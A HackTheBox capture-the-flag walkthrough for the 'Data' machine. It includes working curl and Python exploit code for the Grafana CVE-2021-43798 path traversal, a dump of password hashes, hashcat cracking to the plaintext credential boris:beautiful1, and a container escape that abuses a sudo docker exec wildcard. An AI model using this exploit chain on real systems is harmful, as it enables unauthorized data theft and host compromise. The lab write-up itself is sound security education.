HackTheBox - Data

Updated 29-03-2026

A Linux machine where a path traversal in a popular metrics platform leaks its own database — and a misconfigured container environment offers an unconventional route to the underlying host.

Tools

  • sqlite3
  • grafana2hashcat
  • hashcat

Nmap

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -p22,3000 10.129.3.91
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-12 14:57 EST
Nmap scan report for 10.129.3.91
Host is up (0.26s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 63:47:0a:81:ad:0f:78:07:46:4b:15:52:4a:4d:1e:39 (RSA)
| 256 7d:a9:ac:fa:01:e8:dd:09:90:40:48:ec:dd:f3:08:be (ECDSA)
|_ 256 91:33:2d:1a:81:87:1a:84:d3:b9:0b:23:23:3d:19:4b (ED25519)
3000/tcp open ppp?
| Location: /login

Foothold

Accessing http://10.129.3.91:3000/ redirects to the Grafana login page.
The footer reveals the application is running Grafana v8.0.0.

Grafana v8.0.0 is vulnerable to CVE-2021-43798, an unauthenticated path traversal in the plugin asset handler: a request for /public/plugins/<plugin-id>/../../... walks out of the plugin directory and returns any file the Grafana process can read. Two details matter in practice: the plugin id must be one the server actually has installed (welcome is bundled with Grafana), and the ../ segments must reach the server verbatim, which is why curl is run with --path-as-is (by default it squashes dot segments client-side before sending the request). The affected range is 8.0.0-beta1 through 8.3.0, fixed in 8.0.7, 8.1.8, 8.2.7 and 8.3.1.

Since the vulnerability allows arbitrary file disclosure, the Grafana SQLite database at /var/lib/grafana/grafana.db, which holds the user table with the password hashes, can be retrieved directly:

$ curl --path-as-is http://10.129.3.91:3000/public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
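The same request in Python, as an added example that is not part of the original writeup: a check of whether a reported Grafana version falls in the CVE-2021-43798 range, a builder for the traversal path, and a fetch that sends the dot segments unnormalised (http.client does not rewrite them, so no --path-as-is equivalent is needed). The host, port and plugin id are assumptions taken from the scan and the curl command above.

```python
"""Added example (not from the original writeup): CVE-2021-43798 version check,
traversal path builder and raw fetch. Host/port/plugin id are assumptions
copied from the walkthrough above."""
import http.client
import re
from typing import Optional

# Affected: 8.0.0-beta1 .. 8.3.0; fixed in 8.0.7, 8.1.8, 8.2.7, 8.3.1 (GHSA-8pjx-jj86-j47p)
FIXED_PATCH = {0: 7, 1: 8, 2: 7, 3: 1}


def is_vulnerable_version(version: str) -> bool:
    """True if a Grafana version string (e.g. 'v8.0.0', '8.2.3-beta1') is in the affected range."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)(-[\w.]+)?$", version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch = (int(m.group(i)) for i in (1, 2, 3))
    if major != 8 or minor > 3:
        return False
    # pre-release tags sort before the final release, so 8.0.0-beta1 counts as < 8.0.7
    return patch < FIXED_PATCH[minor]


def traversal_path(plugin_id: str, target: str, depth: int = 8) -> str:
    """Request path that escapes /public/plugins/<plugin_id>/ and reaches `target`.
    plugin_id must be a plugin the server has installed (welcome is bundled);
    otherwise Grafana answers 404 before the path is resolved. `depth` only has
    to be large enough to reach '/'; extra '..' at the root are harmless."""
    return f"/public/plugins/{plugin_id}/" + "../" * depth + target.lstrip("/")


def fetch_file(host: str, port: int, target: str, plugin_id: str = "welcome") -> Optional[bytes]:
    """GET the file through the traversal. Returns the body on HTTP 200, None otherwise."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    try:
        conn.request("GET", traversal_path(plugin_id, target))
        resp = conn.getresponse()
        return resp.read() if resp.status == 200 else None
    finally:
        conn.close()


if __name__ == "__main__":
    print(is_vulnerable_version("v8.0.0"))  # version from the login page footer
    print(traversal_path("welcome", "/etc/passwd"))
    # assumed target from the walkthrough; requires network access to the box
    data = fetch_file("10.129.3.91", 3000, "/var/lib/grafana/grafana.db")
    if data:
        with open("grafana.db", "wb") as f:
            f.write(data)
```

The version check is a quick way to confirm the footer string before firing the request; a 404 on the traversal usually means the plugin id is wrong rather than the server being patched, so try another bundled plugin before concluding anything.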

Using sqlite3, the contents of the database can be inspected to extract credentials and other sensitive data.

$ sqlite3 grafana.db  
sqlite> .tables
<-SNIP->
sqlite> select * from user;
sqlite> select login, password, salt from user;
admin|7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8|YObSoLj55S
boris|dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8|LCBhdtJWjl

The user table stores password hashes and salts for two users: admin and boris.

Grafana's stored digests are not in a format hashcat accepts directly. The password column is the hex encoding of a 50-byte PBKDF2-HMAC-SHA256 output (10,000 iterations) and the salt column is the plaintext salt.

hashcat mode 10900 (PBKDF2-HMAC-SHA256) expects one line per hash in the form

sha256:NumberOfIterations:Base64EncodedSalt:Base64EncodedDigest

where the salt field is the base64 of the raw salt string and the digest field is the base64 of the decoded hex. The grafana2hashcat tool does this conversion (hashes.txt holds the hash/salt pairs from the database in the tool's input format), and hashcat then cracks the result; nothing is decrypted, PBKDF2 is one-way.

$ python3 grafana2hashcat.py ../hashes.txt -o grafana_hashes.txt

$ hashcat -m 10900 grafana_hashes.txt /usr/share/wordlists/rockyou.txt

sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=:beautiful1
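The conversion, and a check that the cracked password really reproduces the stored digest, as an added example that is not part of the original writeup or of the grafana2hashcat project. The two rows are the ones dumped from grafana.db above; the KDF parameters are Grafana's (PBKDF2-HMAC-SHA256, 10,000 iterations, 50-byte derived key).

```python
"""Added example (not from the original writeup or grafana2hashcat): re-encode
Grafana's hex digest + plaintext salt into hashcat -m 10900 format and verify a
candidate password with the same KDF Grafana uses."""
import base64
import hashlib
import hmac

ITERATIONS = 10_000

# Rows copied from the `select login, password, salt from user;` output above.
USERS = {
    "admin": ("7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8", "YObSoLj55S"),
    "boris": ("dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8", "LCBhdtJWjl"),
}


def to_hashcat(hex_digest: str, salt: str, iterations: int = ITERATIONS) -> str:
    """sha256:<iter>:<b64 salt>:<b64 digest>, the layout hashcat -m 10900 expects.
    The salt is base64 of the raw ASCII salt; the digest is base64 of the decoded hex."""
    b64_salt = base64.b64encode(salt.encode()).decode()
    b64_digest = base64.b64encode(bytes.fromhex(hex_digest)).decode()
    return f"sha256:{iterations}:{b64_salt}:{b64_digest}"


def verify_password(password: str, hex_digest: str, salt: str, iterations: int = ITERATIONS) -> bool:
    """Recompute Grafana's PBKDF2 digest for `password` and compare in constant time.
    dklen is taken from the stored digest (50 bytes for Grafana)."""
    expected = bytes.fromhex(hex_digest)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations, dklen=len(expected))
    return hmac.compare_digest(derived, expected)


def convert_all(users: dict) -> list:
    """One hashcat line per user, in the order of the dict."""
    return [to_hashcat(h, s) for h, s in users.values()]


if __name__ == "__main__":
    with open("grafana_hashes.txt", "w") as f:
        f.write("\n".join(convert_all(USERS)) + "\n")
    print(verify_password("beautiful1", *USERS["boris"]))  # True
```

The verify function is also the honest way to confirm a crack before spending an SSH attempt on it: a wrong dklen or iteration count would make hashcat silently miss every candidate, whereas this reproduces the exact stored digest or does not.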

The hash for boris is successfully cracked, revealing valid credentials: boris:beautiful1.
These credentials allow authentication via SSH.

$ ssh boris@10.129.3.91

boris@data:~$ cat user.txt

Privilege Escalation

Checking sudo permissions:

boris@data:~$ sudo -l
Matching Defaults entries for boris on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User boris may run the following commands on localhost:
(root) NOPASSWD: /snap/bin/docker exec *

The trailing wildcard means boris can pass any arguments to docker exec, including -u 0 to run as root inside the container, but the rule does not cover docker ps, so the container ID has to come from somewhere else. Every running container has a containerd-shim-runc-v2 process on the host whose -id argument is the container ID, and the process list is readable by any user:

$ ps aux | grep docker
<-SNIP->
root 1614 0.0 0.4 711456 9148 ? Sl 19:39 0:01 /snap/docker/1125/bin/containerd-shim-runc-v2 -namespace moby -id e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 -address /run/snap.docker/containerd/containerd.sock
<-SNIP->

The -id argument of the containerd-shim-runc-v2 process is the full 64-character container ID. docker exec accepts any unambiguous prefix of it, and -u 0 starts the shell as root inside the container, with whatever capabilities and devices the container was started with:

$ sudo /snap/bin/docker exec -u 0 -it e6ff5b1cbc85 bash
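The same lookup done programmatically, as an added example that is not part of the original writeup: pull every container ID out of ps output by reading the -id argument of each containerd-shim-runc-v2 process, then build the docker exec command the sudo rule permits. The sample ps text is constructed from the shim line shown above plus an unrelated process, and the docker path is the one granted in the sudoers rule.

```python
"""Added example (not from the original writeup): extract container IDs from
`ps aux` output and build the matching `sudo docker exec -u 0` command.
Sample input is constructed from the ps line in the walkthrough."""
import re
import shlex

DOCKER = "/snap/bin/docker"  # path granted by the NOPASSWD rule above

# Constructed sample: the shim line from the ps output above plus a non-matching process.
SAMPLE_PS = """\
root      1614  0.0  0.4 711456  9148 ?     Sl   19:39   0:01 /snap/docker/1125/bin/containerd-shim-runc-v2 -namespace moby -id e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 -address /run/snap.docker/containerd/containerd.sock
boris     2201  0.0  0.1  10000  2000 pts/0 S+   19:41   0:00 grep docker
"""

# a shim process, then its -id argument: a 64-hex container ID
SHIM_RE = re.compile(r"containerd-shim-runc-v2\b.*?-id\s+([0-9a-f]{64})")


def container_ids(ps_output: str) -> list:
    """Full container IDs of every running shim, in ps order."""
    ids = []
    for line in ps_output.splitlines():
        m = SHIM_RE.search(line)
        if m:
            ids.append(m.group(1))
    return ids


def exec_command(container_id: str, shell: str = "bash") -> list:
    """argv for a root shell inside the container through the sudo rule.
    docker accepts any unambiguous prefix of the ID; the first 12 characters
    are the short form `docker ps` would show."""
    return ["sudo", DOCKER, "exec", "-u", "0", "-it", container_id[:12], shell]


if __name__ == "__main__":
    for cid in container_ids(SAMPLE_PS):
        print(shlex.join(exec_command(cid)))
```

On a host with several containers the list will have more than one entry; the one worth entering is whichever was started with the host's devices, which is only visible from inside, so try each.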

Block devices for the host's disk (/dev/sda and its partitions) are visible inside the container, so it was started with the host's devices exposed, most likely --privileged, which also leaves the container with the CAP_SYS_ADMIN needed to mount them:

bash-5.1# ls -lah /dev
<-SNIPPED->
brw-rw---- 1 root disk 8, 0 Feb 12 19:39 sda
brw-rw---- 1 root disk 8, 1 Feb 12 19:39 sda1
brw-rw---- 1 root disk 8, 2 Feb 12 19:39 sda2
<-SNIPPED->

Mounting /dev/sda1 inside the container gives direct, writable access to the host's root filesystem (if it is not obvious which partition holds it, blkid or mounting the candidates in turn settles it). The root flag is then at /mnt/host/root/root.txt, and the same mount lets anything on the host, such as root's authorized_keys, be changed from inside the container.

bash-5.1# mkdir /mnt/host
bash-5.1# mount /dev/sda1 /mnt/host
bash-5.1# ls -lah /mnt/host
<-SNIP->
drwx------ 7 root root 4.0K Feb 12 19:39 root
<-SNIP->

Key Takeaways

  • CVE-2021-43798 enables unauthenticated arbitrary file disclosure in Grafana 8.0.0-beta1 through 8.3.0; Grafana's own grafana.db is the highest-value target.
  • Grafana stores credentials in SQLite as hex PBKDF2-HMAC-SHA256 digests with plaintext salts; once re-encoded for hashcat mode 10900 they crack like any other PBKDF2 hash.
  • A sudo rule ending in a wildcard (docker exec *) lets the user choose -u 0 and any container on the host.
  • Exposing host block devices inside a container (for example via --privileged) lets it mount the host filesystem, which is full host compromise.